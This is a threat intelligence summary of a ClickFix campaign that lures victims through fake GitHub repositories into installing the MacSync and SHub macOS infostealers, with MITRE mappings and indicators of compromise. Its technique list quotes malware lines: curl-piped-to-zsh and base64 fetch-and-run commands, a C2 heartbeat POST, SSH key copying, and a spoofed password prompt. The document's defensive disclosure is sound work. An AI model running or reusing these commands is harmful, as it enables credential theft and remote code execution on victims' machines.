Threat Research

Tech impersonators: ClickFix and MacOS infostealers

DataDogHQ
Tech impersonators: ClickFix and MacOS infostealers

Datadog observed an active campaign using fake GitHub repositories and ClickFix landing pages to social-engineer victims into pasting commands that install macOS infostealers and (in some builds) Windows components. The actor iterates on MacSync and a persistent SHub Stealer v2.0—adding credential validation, broad file and wallet collection, dynamic anti-analysis, and a LaunchAgent-based beacon for remote command execution. #SHub #MacSync

Keypoints

  • Threat actor uses impersonating GitHub repositories and SEO-optimized pages to redirect victims to ClickFix pages that instruct users to copy/paste commands into Terminal/PowerShell.
  • Initial access relies on the ClickFix “copy/paste command” tradecraft, shifting execution decisions to victims and enabling scalable delivery across lures and platforms.
  • Campaign delivered macOS infostealers MacSync and SHub v2.0; SHub v2.0 adds persistence (LaunchAgent), remote command execution, improved password validation, and expanded wallet/enterprise collection.
  • Stagers and delivery vary between base64-encoded, network-delivered AppleScript and curl|shell execution to minimize on-disk artifacts and evade detections.
  • Actor collects developer/cloud artifacts, browser data, Apple Notes, and numerous desktop wallet/artifact locations; telemetry and campaign attribution are exfiltrated to Google Apps Script and actor C2s.
  • Datadog reported impersonating repos to GitHub for takedown and recommends source verification, repository validation, and user training focused on copy/paste command risks.

MITRE Techniques

  • [T1056.002 ] Input Capture: GUI Input Capture – Used to present a spoofed password dialog to the user for credential harvest (‘Required Application Helper. Please enter password for continue.’).
  • [T1056 ] Input Capture – Implements credential validation and capture, including Directory Services checks (‘dscl . authonly’).
  • [T1005 ] Data from Local System – Recursively collects local developer and cloud artifacts such as SSH, AWS, and kube configs (‘cp -r ~/.ssh’).
  • [T1119 ] Automated Collection – Implements a size-aware folder grabber and recursive file collection using Spotlight metadata and limits (‘set fsz to (do shell script “/usr/bin/mdls -name kMDItemFSSize -raw ” & theItem)’).
  • [T1552.001 ] Credentials in Files – Targets wallet and key file types and other credential-containing files via extension lists (‘set extensionsList to {“pdf”,”docx”,”doc”,”wallet”,”key”,”keys”,”db”,…}’).
  • [T1555.003 ] Credentials from Web Browsers – Extracts browser-stored credentials, cookies, and wallet extension data, including IndexedDB entries (‘IndexedDB entries matching the wallet ID’).
  • [T1036.005 ] Masquerading: Match Legitimate Name or Location – Persists using a fake GoogleUpdate binary and legitimate-looking LaunchAgent label (‘com.google.keystone.agent.plist’).
  • [T1547.011 ] Boot or Logon Autostart Execution: LaunchAgent – Establishes persistence with a LaunchAgent plist configured to run at interval (‘StartInterval60‘).
  • [T1071.001 ] Application Layer Protocol: Web Protocols – Uses HTTP/HTTPS for exfiltration and continuous beaconing to C2 (‘curl -s -X POST “$GATE_URL/api/bot/heartbeat”‘).
  • [T1105 ] Ingress Tool Transfer – Delivers base64-encoded commands from C2 which are decoded and executed on host (‘echo “$CODE” | base64 -d > /tmp/.c.sh && chmod +x /tmp/.c.sh && /tmp/.c.sh; rm -f /tmp/.c.sh’).
  • [T1059.004 ] Command and Scripting Interpreter: Shell – Relies on paste-to-shell execution patterns and remote script execution via decoded curl payloads (‘curl -s $(echo … | base64 -d) | zsh’).
  • [T1070.004 ] Indicator Removal on Host: File Deletion – Performs cleanup of staging archives and temporary payloads after exfiltration (‘rm -f /tmp/osalogging.zip’).

Indicators of Compromise

  • [C2 Domains ] actor command-and-control domains – imper-strlk5[.]com, securityfenceandwelding[.]com, and 3 more domains
  • [C2 Endpoints ] exfiltration and beaconing URIs on C2 servers – /gate, /api/bot/heartbeat, and other endpoints such as /loader.sh?build={BUILD_ID}
  • [ClickFix Staging Pages ] GitHub Pages used to stage lures and redirect to ClickFix – git-tool-install.github[.]io, io-app-git.github[.]io, and 2 more pages
  • [Redirect Deeplinks ] URL-shortened deeplinks used to rotate ClickFix infrastructure – pmacos.onelink[.]me/m5yY/q5vbjgvh, pwin.onelink[.]me/zmFc/dt38769z
  • [ClickFix Domains ] landing and download hosts used by ClickFix flow – drmcdermottmd[.]com, hci-outdoors[.]com, and 2 more domains
  • [Client Metadata Exfiltration ] telemetry endpoint used to collect visitor fingerprints and campaign attribution – script.google[.]com/macros/s/AKfycbwip_VgPEumBXeWuX_OEX6huIMHfPXidiweHpHR-fGUQIqpcR-mAMAHC1JCUQyJne3n0Q/exec
  • [GitHub Accounts ] suspected actor accounts used to publish impersonating repos – bubblegum42poptart, tvoymishka30kintus, and other 5 accounts
  • [Fake Repositories ] impersonating project repositories used as lures – github.com/Datadog-Desktop-App, github.com/3Commas-App/.github, and 3 more repositories
  • [Persistence Locations ] installed persistence artifacts and LaunchAgent paths – ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate, ~/Library/LaunchAgents/com.google.keystone.agent.plist
  • [Temporary Files ] staging and exfiltration temporary files – /tmp/shub_log.zip, /tmp/.c.sh, and other staging files (e.g., /tmp/osalogging.zip, /tmp/shub_*)
  • [Trojanized Wallet Endpoints ] paths indicating trojanized wallet payloads – /exodus-asar, /atomic-asar, and other wallet-asar endpoints
  • [Sample/File Hash ] observed sample identifier – 9191101893e419eac4be02d416e4eed405ba2055441f36e564f09c19cb26271c

Read more: https://securitylabs.datadoghq.com/articles/tech-impersonators-clickfix-and-macos-infostealers/